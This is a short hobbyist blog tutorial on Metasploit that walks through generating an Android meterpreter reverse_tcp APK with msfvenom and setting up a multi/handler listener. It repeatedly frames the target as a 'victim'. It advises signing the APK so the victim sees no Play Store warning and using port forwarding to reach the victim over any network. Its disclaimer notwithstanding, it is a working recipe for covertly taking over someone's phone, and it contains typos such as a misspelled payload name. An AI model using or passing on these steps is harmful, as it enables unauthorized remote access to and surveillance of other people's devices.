What Is Metasploit And Payloads | By H4Ck3R

What Is Metasploit And Payloads

Introduction

Metasploit is mostly used exploitation framework . Metasploit Framework is set of open source tools that is used for network enummeration , vulnerability scanning , payload making , exploit etc. 
Main Components

Auxiliary 

It is a supporting module , such as scanner , fuzzers , crawlers etc found here.

Encoders

It is used to encode the exploit and payload to bypass signature based antivirus

Payloads 

Payloads is just a code which is run in target system .

Exploits 

It provides access to the target system .

Also Read : How To Install Metasploit In Termux

Also Read : How To Install Metasploit In any Linux

Payloads 

We generally create two types of payloads :

  • Using IP
  • Using Portforwarding

Using IP

./msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 R> /sdcard/payload.apk

You can customize lhost and lport according to your use if you want to use portforwarding then put lhost and lport according to your portforwarding port and lhost. 

This apk will save on international storage il, if you want any another location just type the folder name 

  • Ex:- /sdcard/h4ck3r/…../pd.apk

Using this you will create a payload just install it on victim phone 
 
NOTE : You need to connect hotspot with victim phone “Else it will not work”
 
Before sending apk to victim don’t forget to sign the apk using any apk , else playstore will give some warning to the victim. 
 
Special : you need to setup portforwarding to access victim over any network
 
Portmap.io provide free portforwarding but premium portforwarding will work good if you want good connection

Multi Handler

 For connection you need setup multi handler

Run metasploit framework first

  • cd metasploit-framework
  • ./msfconsole
  • use exploit/multi/handler
  • set payload android/metrpreter/reverse_tcp
  • set lhost 127.0.0.1
  • set lport 4444
  • exploit

After connecting to the device you can use many commands, for the command list you can type “help” to get all the commands. 

Google for the command information before executing it may some command wipe the data of their phone or may damage the motherboard 

Conclusion

In this article, we will learn about a most advance and power full tool Metasploit which made for security purpose or to find vulnerability. All the information are for educational purposes, we don’t promote any illegal activity . 

Leave a Comment